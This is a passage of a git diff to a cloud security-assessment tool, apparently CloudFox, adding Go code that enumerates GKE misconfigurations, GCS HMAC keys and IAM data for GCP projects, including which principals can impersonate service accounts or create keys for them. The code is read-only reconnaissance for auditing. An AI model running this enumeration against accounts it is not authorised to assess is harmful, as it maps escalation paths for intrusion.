GKE scopes (limited) + scopeSummary = "Default" + } else { + scopeSummary = "Restricted" + } + + return +} + +// identifySecurityIssues checks for common security misconfigurations +func identifySecurityIssues(cluster ClusterInfo) []string { + var issues []string + + // Public endpoint without authorized networks + if !cluster.PrivateCluster && !cluster.MasterAuthorizedOnly { + issues = append(issues, "Public endpoint without master authorized networks") + } + + // Legacy ABAC enabled + if cluster.LegacyABAC { + issues = append(issues, "Legacy ABAC authorization enabled") + } + + // Basic auth enabled + if cluster.BasicAuthEnabled { + issues = append(issues, "Basic authentication enabled (deprecated)") + } + + // Client certificate + if cluster.IssueClientCertificate { + issues = append(issues, "Client certificate authentication enabled") + } + + // No network policy + if !cluster.NetworkPolicy { + issues = append(issues, "Network policy not enabled") + } + + // No workload identity + if cluster.WorkloadIdentity == "" { + issues = append(issues, "Workload Identity not configured") + } + + // Shielded nodes not enabled + if !cluster.ShieldedNodes { + issues = append(issues, "Shielded nodes not enabled") + } + + // Default service account on nodes + if cluster.NodeServiceAccount == "default" || + strings.HasSuffix(cluster.NodeServiceAccount, "-compute@developer.gserviceaccount.com") { + issues = append(issues, "Default service account used on nodes") + } + + // No release channel (manual upgrades) + if cluster.ReleaseChannel == "" || cluster.ReleaseChannel == "UNSPECIFIED" { + issues = append(issues, "No release channel configured") + } + + return issues +} + diff --git a/gcp/services/hmacService/hmacService.go b/gcp/services/hmacService/hmacService.go new file mode 100644 index 00000000..04d6a0b4 --- /dev/null +++ b/gcp/services/hmacService/hmacService.go @@ -0,0 +1,162 @@ +package hmacservice + +import ( + "context" + "fmt" + "time" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" + "google.golang.org/api/storage/v1" +) + +type HMACService struct { + session *gcpinternal.SafeSession +} + +func New() *HMACService { + return &HMACService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *HMACService { + return &HMACService{session: session} +} + +// getStorageService returns a Storage service client using cached session if available +func (s *HMACService) getStorageService(ctx context.Context) (*storage.Service, error) { + if s.session != nil { + return sdk.CachedGetStorageService(ctx, s.session) + } + return storage.NewService(ctx) +} + +// HMACKeyInfo represents a GCS HMAC key (S3-compatible access) +type HMACKeyInfo struct { + AccessID string `json:"accessId"` + ProjectID string `json:"projectId"` + ServiceAccountEmail string `json:"serviceAccountEmail"` + State string `json:"state"` // ACTIVE, INACTIVE, DELETED + TimeCreated time.Time `json:"timeCreated"` + Updated time.Time `json:"updated"` + Etag string `json:"etag"` + // Pentest-specific fields + IsActive bool `json:"isActive"` + RiskLevel string `json:"riskLevel"` + RiskReasons []string `json:"riskReasons"` +} + +// ListHMACKeys lists all HMAC keys in a project +func (s *HMACService) ListHMACKeys(projectID string) ([]HMACKeyInfo, error) { + ctx := context.Background() + + storageService, err := s.getStorageService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "storage.googleapis.com") + } + + var keys []HMACKeyInfo + + // List all HMAC keys for the project + req := storageService.Projects.HmacKeys.List(projectID) + err = req.Pages(ctx, func(page *storage.HmacKeysMetadata) error { + for _, key := range page.Items { + info := s.parseHMACKey(key, projectID) + keys = append(keys, info) + } + return nil + }) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "storage.googleapis.com") + } + + return keys, nil +} + +func (s *HMACService) parseHMACKey(key *storage.HmacKeyMetadata, projectID string) HMACKeyInfo { + info := HMACKeyInfo{ + AccessID: key.AccessId, + ProjectID: projectID, + ServiceAccountEmail: key.ServiceAccountEmail, + State: key.State, + Etag: key.Etag, + IsActive: key.State == "ACTIVE", + RiskReasons: []string{}, + } + + // Parse timestamps + if key.TimeCreated != "" { + if t, err := time.Parse(time.RFC3339, key.TimeCreated); err == nil { + info.TimeCreated = t + } + } + if key.Updated != "" { + if t, err := time.Parse(time.RFC3339, key.Updated); err == nil { + info.Updated = t + } + } + + // Analyze risk + info.RiskLevel, info.RiskReasons = s.analyzeHMACKeyRisk(info) + + return info +} + +func (s *HMACService) analyzeHMACKeyRisk(key HMACKeyInfo) (string, []string) { + var reasons []string + score := 0 + + // Active keys are more risky + if key.IsActive { + reasons = append(reasons, "HMAC key is ACTIVE (can be used for S3-compatible access)") + score += 2 + } + + // Check key age + if !key.TimeCreated.IsZero() { + age := time.Since(key.TimeCreated) + if age > 365*24*time.Hour { + reasons = append(reasons, fmt.Sprintf("Key is over 1 year old (%d days)", int(age.Hours()/24))) + score += 2 + } else if age > 90*24*time.Hour { + reasons = append(reasons, fmt.Sprintf("Key is over 90 days old (%d days)", int(age.Hours()/24))) + score += 1 + } + } + + // Default compute SA HMAC keys are especially risky + if key.ServiceAccountEmail != "" { + if isDefaultComputeSA(key.ServiceAccountEmail) { + reasons = append(reasons, "HMAC key belongs to default compute service account") + score += 1 + } + } + + if score >= 4 { + return "HIGH", reasons + } else if score >= 2 { + return "MEDIUM", reasons + } else if score >= 1 { + return "LOW", reasons + } + return "INFO", reasons +} + +func isDefaultComputeSA(email string) bool { + // Check for default compute service account pattern + return len(email) > 0 && + (contains(email, "-compute@developer.gserviceaccount.com") || + contains(email, "@appspot.gserviceaccount.com")) +} + +func contains(s, substr string) bool { + return len(s) >= len(substr) && (s == substr || len(s) > 0 && containsSubstr(s, substr)) +} + +func containsSubstr(s, substr string) bool { + for i := 0; i <= len(s)-len(substr); i++ { + if s[i:i+len(substr)] == substr { + return true + } + } + return false +} diff --git a/gcp/services/iamService/iamService.go b/gcp/services/iamService/iamService.go index bf63c759..f5737acb 100644 --- a/gcp/services/iamService/iamService.go +++ b/gcp/services/iamService/iamService.go @@ -4,104 +4,262 @@ import ( "context" "fmt" "strings" + "time" iampb "cloud.google.com/go/iam/apiv1/iampb" resourcemanager "cloud.google.com/go/resourcemanager/apiv3" resourcemanagerpb "cloud.google.com/go/resourcemanager/apiv3/resourcemanagerpb" "github.com/BishopFox/cloudfox/globals" "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" + cloudidentity "google.golang.org/api/cloudidentity/v1" + crmv1 "google.golang.org/api/cloudresourcemanager/v1" + iam "google.golang.org/api/iam/v1" + "google.golang.org/api/iterator" + "google.golang.org/api/option" ) type IAMService struct { - // DataStoreService datastoreservice.DataStoreService + session *gcpinternal.SafeSession } +// New creates a new IAMService (legacy - uses ADC directly) func New() *IAMService { return &IAMService{} } +// NewWithSession creates an IAMService with a SafeSession for managed authentication +func NewWithSession(session *gcpinternal.SafeSession) *IAMService { + return &IAMService{session: session} +} + +// getClientOption returns the appropriate client option based on session +func (s *IAMService) getClientOption() option.ClientOption { + if s.session != nil { + return s.session.GetClientOption() + } + return nil +} + +// getIAMService returns an IAM service using cached SDK wrapper when session is available +func (s *IAMService) getIAMService(ctx context.Context) (*iam.Service, error) { + if s.session != nil { + return sdk.CachedGetIAMService(ctx, s.session) + } + return iam.NewService(ctx) +} + +// getResourceManagerService returns a Resource Manager service using cached SDK wrapper when session is available +func (s *IAMService) getResourceManagerService(ctx context.Context) (*crmv1.Service, error) { + if s.session != nil { + return sdk.CachedGetResourceManagerService(ctx, s.session) + } + return crmv1.NewService(ctx) +} + +// getCloudIdentityService returns a Cloud Identity service using cached SDK wrapper when session is available +func (s *IAMService) getCloudIdentityService(ctx context.Context) (*cloudidentity.Service, error) { + if s.session != nil { + return sdk.CachedGetCloudIdentityService(ctx, s.session) + } + return cloudidentity.NewService(ctx) +} + // AncestryResource represents a single resource in the project's ancestry. type AncestryResource struct { Type string `json:"type"` Id string `json:"id"` } +// IAMCondition represents a parsed IAM condition (conditional access policy) +type IAMCondition struct { + Title string `json:"title"` + Description string `json:"description"` + Expression string `json:"expression"` +} + // PolicyBindings represents IAM policy bindings. type PolicyBinding struct { - Role string `json:"role"` - Members []string `json:"members"` - ResourceID string `json:"resourceID"` - ResourceType string - PolicyName string `json:"policyBindings"` - Condition string + Role string `json:"role"` + Members []string `json:"members"` + ResourceID string `json:"resourceID"` + ResourceType string `json:"resourceType"` + PolicyName string `json:"policyBindings"` + Condition string `json:"condition"` + ConditionInfo *IAMCondition `json:"conditionInfo"` // Parsed condition details + HasCondition bool `json:"hasCondition"` // True if binding has conditions + IsInherited bool `json:"isInherited"` // True if inherited from folder/org + InheritedFrom string `json:"inheritedFrom"` // Source of inheritance (folder/org ID) } type PrincipalWithRoles struct { - Name string - Type string - PolicyBindings []PolicyBinding - ResourceID string - ResourceType string + Name string `json:"name"` + Type string `json:"type"` + PolicyBindings []PolicyBinding `json:"policyBindings"` + ResourceID string `json:"resourceID"` + ResourceType string `json:"resourceType"` + // Enhanced fields + Email string `json:"email"` // Clean email without prefix + DisplayName string `json:"displayName"` // For service accounts + Description string `json:"description"` // For service accounts + Disabled bool `json:"disabled"` // For service accounts + UniqueID string `json:"uniqueId"` // For service accounts + HasKeys bool `json:"hasKeys"` // Service account has user-managed keys + KeyCount int `json:"keyCount"` // Number of user-managed keys + HasCustomRoles bool `json:"hasCustomRoles"` // Has any custom roles assigned + CustomRoles []string `json:"customRoles"` // List of custom role names } -var logger internal.Logger +// ServiceAccountInfo represents detailed info about a service account +type ServiceAccountInfo struct { + Email string `json:"email"` + Name string `json:"name"` // Full resource name + ProjectID string `json:"projectId"` + UniqueID string `json:"uniqueId"` + DisplayName string `json:"displayName"` + Description string `json:"description"` + Disabled bool `json:"disabled"` + OAuth2ClientID string `json:"oauth2ClientId"` + // Key information + HasKeys bool `json:"hasKeys"` + KeyCount int `json:"keyCount"` + Keys []ServiceAccountKeyInfo `json:"keys"` + // Role information + Roles []string `json:"roles"` + HasCustomRoles bool `json:"hasCustomRoles"` + CustomRoles []string `json:"customRoles"` + HasHighPrivilege bool `json:"hasHighPrivilege"` + HighPrivRoles []string `json:"highPrivRoles"` + // Pentest: Impersonation information + CanBeImpersonatedBy []string `json:"canBeImpersonatedBy"` // Principals who can impersonate this SA + CanCreateKeysBy []string `json:"canCreateKeysBy"` // Principals who can create keys for this SA + CanGetAccessTokenBy []string `json:"canGetAccessTokenBy"` // Principals with getAccessToken + CanSignBlobBy []string `json:"canSignBlobBy"` // Principals with signBlob + CanSignJwtBy []string `json:"canSignJwtBy"` // Principals with signJwt + HasImpersonationRisk bool `json:"hasImpersonationRisk"` // True if any impersonation path exists + ImpersonationRiskLevel string `json:"impersonationRiskLevel"` // CRITICAL, HIGH, MEDIUM, LOW +} + +// SAImpersonationInfo represents who can impersonate/abuse a service account +type SAImpersonationInfo struct { + ServiceAccount string `json:"serviceAccount"` + ProjectID string `json:"projectId"` + TokenCreators []string `json:"tokenCreators"` // iam.serviceAccounts.getAccessToken + KeyCreators []string `json:"keyCreators"` // iam.serviceAccountKeys.create + SignBlobUsers []string `json:"signBlobUsers"` // iam.serviceAccounts.signBlob + SignJwtUsers []string `json:"signJwtUsers"` // iam.serviceAccounts.signJwt + ImplicitDelegators []string `json:"implicitDelegators"` // iam.serviceAccounts.implicitDelegation + ActAsUsers []string `json:"actAsUsers"` // iam.serviceAccounts.actAs + SAAdmins []string `json:"saAdmins"` // iam.serviceAccounts.* (full admin) + RiskLevel string `json:"riskLevel"` + RiskReasons []string `json:"riskReasons"` +} + +// ServiceAccountKeyInfo represents a service account key +type ServiceAccountKeyInfo struct { + Name string `json:"name"` + KeyAlgorithm string `json:"keyAlgorithm"` + KeyOrigin string `json:"keyOrigin"` // GOOGLE_PROVIDED or USER_PROVIDED + KeyType string `json:"keyType"` // USER_MANAGED or SYSTEM_MANAGED + ValidAfter time.Time `json:"validAfter"` + ValidBefore time.Time `json:"validBefore"` + Disabled bool `json:"disabled"` +} + +// CustomRole represents a custom IAM role +type CustomRole struct { + Name string `json:"name"` + Title string `json:"title"` + Description string `json:"description"` + IncludedPermissions []string `json:"includedPermissions"` + Stage string `json:"stage"` // ALPHA, BETA, GA, DEPRECATED, DISABLED + Deleted bool `json:"deleted"` + Etag string `json:"etag"` + ProjectID string `json:"projectId"` // Empty if org-level + OrgID string `json:"orgId"` // Empty if project-level + IsProjectLevel bool `json:"isProjectLevel"` + PermissionCount int `json:"permissionCount"` +} + +// GroupMember represents a member of a Google Group +type GroupMember struct { + Email string `json:"email"` + Type string `json:"type"` // USER, SERVICE_ACCOUNT, GROUP (nested) + Role string `json:"role"` // OWNER, MANAGER, MEMBER + Status string `json:"status"` // ACTIVE, SUSPENDED, etc. + IsExternal bool `json:"isExternal"` // External to the organization +} + +// GroupInfo represents a Google Group (for tracking group memberships) +type GroupInfo struct { + Email string `json:"email"` + DisplayName string `json:"displayName"` + Description string `json:"description"` + Roles []string `json:"roles"` // Roles assigned to this group + ProjectID string `json:"projectId"` + Members []GroupMember `json:"members"` // Direct members of this group + NestedGroups []string `json:"nestedGroups"` // Groups that are members of this group + MemberCount int `json:"memberCount"` // Total direct members + HasNestedGroups bool `json:"hasNestedGroups"` + MembershipEnumerated bool `json:"membershipEnumerated"` // Whether we successfully enumerated members +} + +// CombinedIAMData holds all IAM-related data for a project +type CombinedIAMData struct { + Principals []PrincipalWithRoles `json:"principals"` + ServiceAccounts []ServiceAccountInfo `json:"serviceAccounts"` + CustomRoles []CustomRole `json:"customRoles"` + Groups []GroupInfo `json:"groups"` + InheritedRoles []PolicyBinding `json:"inheritedRoles"` +} + +var logger = internal.NewLogger() -func projectAncestry(projectID string) ([]AncestryResource, error) { +func (s *IAMService) projectAncestry(projectID string) ([]AncestryResource, error) { ctx := context.Background() - projectsClient, err := resourcemanager.NewProjectsClient(ctx) + + // Use the v1 GetAncestry API which only requires project-level read permissions + // This avoids needing resourcemanager.folders.get on each folder in the hierarchy + crmService, err := s.getResourceManagerService(ctx) if err != nil { - return nil, fmt.Errorf("failed to create projects client: %v", err) + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") } - defer projectsClient.Close() - foldersClient, err := resourcemanager.NewFoldersClient(ctx) + resp, err := crmService.Projects.GetAncestry(projectID, &crmv1.GetAncestryRequest{}).Context(ctx).Do() if err != nil { - return nil, fmt.Errorf("failed to create folders client: %v", err) + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") } - defer foldersClient.Close() - resourceID := "projects/" + projectID + // GetAncestry returns ancestors from bottom to top (project first, then parent folders, then org) + // We need to reverse to get org -> folders -> project order var ancestry []AncestryResource - - for { - if strings.HasPrefix(resourceID, "organizations/") { - ancestry = append(ancestry, AncestryResource{Type: "organization", Id: strings.TrimPrefix(resourceID, "organizations/")}) - break - } else if strings.HasPrefix(resourceID, "folders/") { - resp, err := foldersClient.GetFolder(ctx, &resourcemanagerpb.GetFolderRequest{Name: resourceID}) - if err != nil { - logger.ErrorM(fmt.Sprintf("failed to access folder %s, %v", resourceID, err), globals.GCP_IAM_MODULE_NAME) - break // Stop processing further if a folder is inaccessible - } - ancestry = append(ancestry, AncestryResource{Type: "folder", Id: strings.TrimPrefix(resp.Name, "folders/")}) - resourceID = resp.Parent - } else if strings.HasPrefix(resourceID, "projects/") { - resp, err := projectsClient.GetProject(ctx, &resourcemanagerpb.GetProjectRequest{Name: resourceID}) - if err != nil { - logger.ErrorM(fmt.Sprintf("failed to access project %s, %v", resourceID, err), globals.GCP_IAM_MODULE_NAME) - return nil, fmt.Errorf("failed to get project: %v", err) - } - ancestry = append(ancestry, AncestryResource{Type: "project", Id: strings.TrimPrefix(resp.Name, "projects/")}) - resourceID = resp.Parent - } else { - return nil, fmt.Errorf("unknown resource type for: %s", resourceID) + for i := len(resp.Ancestor) - 1; i >= 0; i-- { + ancestor := resp.Ancestor[i] + if ancestor.ResourceId != nil { + ancestry = append(ancestry, AncestryResource{ + Type: ancestor.ResourceId.Type, + Id: ancestor.ResourceId.Id, + }) } } - // Reverse the slice as we've built it from child to ancestor - for i, j := 0, len(ancestry)-1; i < j; i, j = i+1, j-1 { - ancestry[i], ancestry[j] = ancestry[j], ancestry[i] - } - return ancestry, nil } // Policies fetches IAM policy for a given resource and all policies in resource ancestry func (s *IAMService) Policies(resourceID string, resourceType string) ([]PolicyBinding, error) { ctx := context.Background() - client, err := resourcemanager.NewProjectsClient(ctx) + var client *resourcemanager.ProjectsClient + var err error + + if s.session != nil { + client, err = resourcemanager.NewProjectsClient(ctx, s.session.GetClientOption()) + } else { + client, err = resourcemanager.NewProjectsClient(ctx) + } if err != nil { - return nil, fmt.Errorf("resourcemanager.NewProjectsClient: %v", err) + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") } defer client.Close() @@ -124,7 +282,7 @@ func (s *IAMService) Policies(resourceID string, resourceType string) ([]PolicyB // Fetch the IAM policy for the resource policy, err := client.GetIamPolicy(ctx, req) if err != nil { - return nil, fmt.Errorf("client.GetIamPolicy: %v", err) + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") } // Assemble the policy bindings @@ -145,17 +303,50 @@ func (s *IAMService) Policies(resourceID string, resourceType string) ([]PolicyB } func determinePrincipalType(member string) string { - if strings.HasPrefix(member, "user:") { + switch { + case strings.HasPrefix(member, "user:"): return "User" - } else if strings.HasPrefix(member, "serviceAccount:") { + case strings.HasPrefix(member, "serviceAccount:"): return "ServiceAccount" - } else if strings.HasPrefix(member, "group:") { + case strings.HasPrefix(member, "group:"): return "Group" - } else { + case strings.HasPrefix(member, "domain:"): + return "Domain" + case member == "allUsers": + return "PUBLIC" + case member == "allAuthenticatedUsers": + return "ALL_AUTHENTICATED" + case strings.HasPrefix(member, "deleted:"): + return "Deleted" + case strings.HasPrefix(member, "projectOwner:"): + return "ProjectOwner" + case strings.HasPrefix(member, "projectEditor:"): + return "ProjectEditor" + case strings.HasPrefix(member, "projectViewer:"): + return "ProjectViewer" + case strings.HasPrefix(member, "principal:"): + return "WorkloadIdentity" + case strings.HasPrefix(member, "principalSet:"): + return "WorkloadIdentityPool" + default: return "Unknown" } } +// extractEmail extracts the clean email/identifier from a member string +func extractEmail(member string) string { + parts := strings.SplitN(member, ":", 2) + if len(parts) == 2 { + return parts[1] + } + return member +} + +// isCustomRole checks if a role is a custom role +func isCustomRole(role string) bool { + return strings.HasPrefix(role, "projects/") || strings.HasPrefix(role, "organizations/") +} + func (s *IAMService) PrincipalsWithRoles(resourceID string, resourceType string) ([]PrincipalWithRoles, error) { policyBindings, err := s.Policies(resourceID, resourceType) if err != nil { @@ -165,16 +356,463 @@ func (s *IAMService) PrincipalsWithRoles(resourceID string, resourceType string) principalMap := make(map[string]*PrincipalWithRoles) for _, pb := range policyBindings { for _, member := range pb.Members { - principalType := determinePrincipalType(member) // Implement this function based on member prefix + principalType := determinePrincipalType(member) if principal, ok := principalMap[member]; ok { principal.PolicyBindings = append(principal.PolicyBindings, pb) + // Track custom roles + if isCustomRole(pb.Role) && !contains(principal.CustomRoles, pb.Role) { + principal.CustomRoles = append(principal.CustomRoles, pb.Role) + principal.HasCustomRoles = true + } } else { + customRoles := []string{} + hasCustomRoles := false + if isCustomRole(pb.Role) { + customRoles = append(customRoles, pb.Role) + hasCustomRoles = true + } principalMap[member] = &PrincipalWithRoles{ Name: member, Type: principalType, + Email: extractEmail(member), PolicyBindings: []PolicyBinding{pb}, ResourceID: resourceID, ResourceType: resourceType, + HasCustomRoles: hasCustomRoles, + CustomRoles: customRoles, + } + } + } + } + + var principals []PrincipalWithRoles + for _, principal := range principalMap { + principals = append(principals, *principal) + } + + return principals, nil +} + +// contains checks if a string slice contains a specific string +func contains(slice []string, item string) bool { + for _, s := range slice { + if s == item { + return true + } + } + return false +} + +// ServiceAccounts retrieves all service accounts in a project with detailed info (including keys) +func (s *IAMService) ServiceAccounts(projectID string) ([]ServiceAccountInfo, error) { + return s.serviceAccountsInternal(projectID, true) +} + +// ServiceAccountsBasic retrieves service accounts without querying keys (faster, fewer permissions needed) +func (s *IAMService) ServiceAccountsBasic(projectID string) ([]ServiceAccountInfo, error) { + return s.serviceAccountsInternal(projectID, false) +} + +// serviceAccountsInternal retrieves service accounts with optional key enumeration +func (s *IAMService) serviceAccountsInternal(projectID string, includeKeys bool) ([]ServiceAccountInfo, error) { + ctx := context.Background() + iamService, err := s.getIAMService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") + } + + var serviceAccounts []ServiceAccountInfo + + // List all service accounts in the project + req := iamService.Projects.ServiceAccounts.List("projects/" + projectID) + err = req.Pages(ctx, func(page *iam.ListServiceAccountsResponse) error { + for _, sa := range page.Accounts { + saInfo := ServiceAccountInfo{ + Email: sa.Email, + Name: sa.Name, + ProjectID: projectID, + UniqueID: sa.UniqueId, + DisplayName: sa.DisplayName, + Description: sa.Description, + Disabled: sa.Disabled, + OAuth2ClientID: sa.Oauth2ClientId, + } + + // Get keys for this service account (only if requested) + if includeKeys { + keys, err := s.getServiceAccountKeys(ctx, iamService, sa.Name) + if err != nil { + // Log but don't fail - we might not have permission + parsedErr := gcpinternal.ParseGCPError(err, "iam.googleapis.com") + gcpinternal.HandleGCPError(parsedErr, logger, globals.GCP_IAM_MODULE_NAME, + fmt.Sprintf("Could not list keys for %s", sa.Email)) + } else { + saInfo.Keys = keys + // Count user-managed keys only + userManagedCount := 0 + for _, key := range keys { + if key.KeyType == "USER_MANAGED" { + userManagedCount++ + } + } + saInfo.KeyCount = userManagedCount + saInfo.HasKeys = userManagedCount > 0 + } + } + + serviceAccounts = append(serviceAccounts, saInfo) + } + return nil + }) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") + } + + return serviceAccounts, nil +} + +// getServiceAccountKeys retrieves keys for a service account +func (s *IAMService) getServiceAccountKeys(ctx context.Context, iamService *iam.Service, saName string) ([]ServiceAccountKeyInfo, error) { + var keys []ServiceAccountKeyInfo + + resp, err := iamService.Projects.ServiceAccounts.Keys.List(saName).Context(ctx).Do() + if err != nil { + return nil, err + } + + for _, key := range resp.Keys { + keyInfo := ServiceAccountKeyInfo{ + Name: key.Name, + KeyAlgorithm: key.KeyAlgorithm, + KeyOrigin: key.KeyOrigin, + KeyType: key.KeyType, + Disabled: key.Disabled, + } + + // Parse timestamps + if key.ValidAfterTime != "" { + if t, err := time.Parse(time.RFC3339, key.ValidAfterTime); err == nil { + keyInfo.ValidAfter = t + } + } + if key.ValidBeforeTime != "" { + if t, err := time.Parse(time.RFC3339, key.ValidBeforeTime); err == nil { + keyInfo.ValidBefore = t + } + } + + keys = append(keys, keyInfo) + } + + return keys, nil +} + +// CustomRoles retrieves all custom roles in a project +func (s *IAMService) CustomRoles(projectID string) ([]CustomRole, error) { + ctx := context.Background() + iamService, err := s.getIAMService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") + } + + var customRoles []CustomRole + + // List project-level custom roles + req := iamService.Projects.Roles.List("projects/" + projectID) + req.ShowDeleted(true) // Include deleted roles for security awareness + err = req.Pages(ctx, func(page *iam.ListRolesResponse) error { + for _, role := range page.Roles { + customRole := CustomRole{ + Name: role.Name, + Title: role.Title, + Description: role.Description, + IncludedPermissions: role.IncludedPermissions, + Stage: role.Stage, + Deleted: role.Deleted, + Etag: role.Etag, + ProjectID: projectID, + IsProjectLevel: true, + PermissionCount: len(role.IncludedPermissions), + } + customRoles = append(customRoles, customRole) + } + return nil + }) + if err != nil { + // Don't fail completely - we might just not have access to list roles + parsedErr := gcpinternal.ParseGCPError(err, "iam.googleapis.com") + gcpinternal.HandleGCPError(parsedErr, logger, globals.GCP_IAM_MODULE_NAME, + fmt.Sprintf("Could not list custom roles for project %s", projectID)) + } + + return customRoles, nil +} + +// PoliciesWithInheritance fetches IAM policies including inherited ones from folders and organization +func (s *IAMService) PoliciesWithInheritance(projectID string) ([]PolicyBinding, error) { + ctx := context.Background() + + // Get project's ancestry + ancestry, err := s.projectAncestry(projectID) + if err != nil { + // If we can't get ancestry, just return project-level policies + gcpinternal.HandleGCPError(err, logger, globals.GCP_IAM_MODULE_NAME, + fmt.Sprintf("Could not get ancestry for project %s, returning project-level policies only", projectID)) + return s.Policies(projectID, "project") + } + + var allBindings []PolicyBinding + + // Get policies for each resource in the ancestry (org -> folders -> project) + for _, resource := range ancestry { + bindings, err := s.getPoliciesForResource(ctx, resource.Id, resource.Type) + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_IAM_MODULE_NAME, + fmt.Sprintf("Could not get policies for %s/%s", resource.Type, resource.Id)) + continue + } + + // Mark inherited bindings + for i := range bindings { + if resource.Type != "project" || resource.Id != projectID { + bindings[i].IsInherited = true + bindings[i].InheritedFrom = fmt.Sprintf("%s/%s", resource.Type, resource.Id) + } + } + + allBindings = append(allBindings, bindings...) + } + + return allBindings, nil +} + +// policyCache caches successful policy lookups per resource +var policyCache = make(map[string][]PolicyBinding) + +// policyFailureCache tracks resources we've already failed to get policies for +var policyFailureCache = make(map[string]bool) + +// getPoliciesForResource fetches policies for a specific resource using the appropriate client +func (s *IAMService) getPoliciesForResource(ctx context.Context, resourceID string, resourceType string) ([]PolicyBinding, error) { + cacheKey := resourceType + "/" + resourceID + + // Check success cache first + if bindings, ok := policyCache[cacheKey]; ok { + return bindings, nil + } + + // Check failure cache - return permission denied without logging again + if policyFailureCache[cacheKey] { + return nil, gcpinternal.ErrPermissionDenied + } + + var resourceName string + + switch resourceType { + case "project": + var client *resourcemanager.ProjectsClient + var err error + if s.session != nil { + client, err = resourcemanager.NewProjectsClient(ctx, s.session.GetClientOption()) + } else { + client, err = resourcemanager.NewProjectsClient(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + defer client.Close() + + resourceName = "projects/" + resourceID + policy, err := client.GetIamPolicy(ctx, &iampb.GetIamPolicyRequest{Resource: resourceName}) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + bindings := convertPolicyToBindings(policy, resourceID, resourceType, resourceName) + policyCache[cacheKey] = bindings + return bindings, nil + + case "folder": + var client *resourcemanager.FoldersClient + var err error + if s.session != nil { + client, err = resourcemanager.NewFoldersClient(ctx, s.session.GetClientOption()) + } else { + client, err = resourcemanager.NewFoldersClient(ctx) + } + if err != nil { + policyFailureCache[cacheKey] = true + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + defer client.Close() + + resourceName = "folders/" + resourceID + policy, err := client.GetIamPolicy(ctx, &iampb.GetIamPolicyRequest{Resource: resourceName}) + if err != nil { + policyFailureCache[cacheKey] = true + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + bindings := convertPolicyToBindings(policy, resourceID, resourceType, resourceName) + policyCache[cacheKey] = bindings + return bindings, nil + + case "organization": + var client *resourcemanager.OrganizationsClient + var err error + if s.session != nil { + client, err = resourcemanager.NewOrganizationsClient(ctx, s.session.GetClientOption()) + } else { + client, err = resourcemanager.NewOrganizationsClient(ctx) + } + if err != nil { + policyFailureCache[cacheKey] = true + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + defer client.Close() + + resourceName = "organizations/" + resourceID + policy, err := client.GetIamPolicy(ctx, &iampb.GetIamPolicyRequest{Resource: resourceName}) + if err != nil { + policyFailureCache[cacheKey] = true + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + bindings := convertPolicyToBindings(policy, resourceID, resourceType, resourceName) + policyCache[cacheKey] = bindings + return bindings, nil + + default: + return nil, fmt.Errorf("unsupported resource type: %s", resourceType) + } +} + +// convertPolicyToBindings converts an IAM policy to PolicyBinding slice +func convertPolicyToBindings(policy *iampb.Policy, resourceID, resourceType, resourceName string) []PolicyBinding { + var bindings []PolicyBinding + for _, binding := range policy.Bindings { + pb := PolicyBinding{ + Role: binding.Role, + Members: binding.Members, + ResourceID: resourceID, + ResourceType: resourceType, + PolicyName: resourceName + "_policyBindings", + } + + // Parse condition if present + if binding.Condition != nil { + pb.Condition = binding.Condition.String() + pb.HasCondition = true + pb.ConditionInfo = &IAMCondition{ + Title: binding.Condition.Title, + Description: binding.Condition.Description, + Expression: binding.Condition.Expression, + } + } + + bindings = append(bindings, pb) + } + return bindings +} + +// CombinedIAM retrieves all IAM-related data for a project +func (s *IAMService) CombinedIAM(projectID string) (CombinedIAMData, error) { + var data CombinedIAMData + + // Get principals with roles (includes inheritance tracking) + principals, err := s.PrincipalsWithRolesEnhanced(projectID) + if err != nil { + return data, fmt.Errorf("failed to get principals: %v", err) + } + data.Principals = principals + + // Get service accounts (without keys - use ServiceAccounts() if keys needed) + serviceAccounts, err := s.ServiceAccountsBasic(projectID) + if err != nil { + // Don't fail completely + gcpinternal.HandleGCPError(err, logger, globals.GCP_IAM_MODULE_NAME, + "Could not get service accounts") + } else { + data.ServiceAccounts = serviceAccounts + } + + // Get custom roles + customRoles, err := s.CustomRoles(projectID) + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_IAM_MODULE_NAME, + "Could not get custom roles") + } else { + data.CustomRoles = customRoles + } + + // Extract groups from principals + var groups []GroupInfo + groupMap := make(map[string]*GroupInfo) + for _, p := range principals { + if p.Type == "Group" { + if _, exists := groupMap[p.Email]; !exists { + groupMap[p.Email] = &GroupInfo{ + Email: p.Email, + ProjectID: projectID, + Roles: []string{}, + } + } + for _, binding := range p.PolicyBindings { + groupMap[p.Email].Roles = append(groupMap[p.Email].Roles, binding.Role) + } + } + } + for _, g := range groupMap { + groups = append(groups, *g) + } + data.Groups = groups + + return data, nil +} + +// PrincipalsWithRolesEnhanced gets principals with roles including inheritance info +func (s *IAMService) PrincipalsWithRolesEnhanced(projectID string) ([]PrincipalWithRoles, error) { + policyBindings, err := s.PoliciesWithInheritance(projectID) + if err != nil { + return nil, err + } + + principalMap := make(map[string]*PrincipalWithRoles) + for _, pb := range policyBindings { + for _, member := range 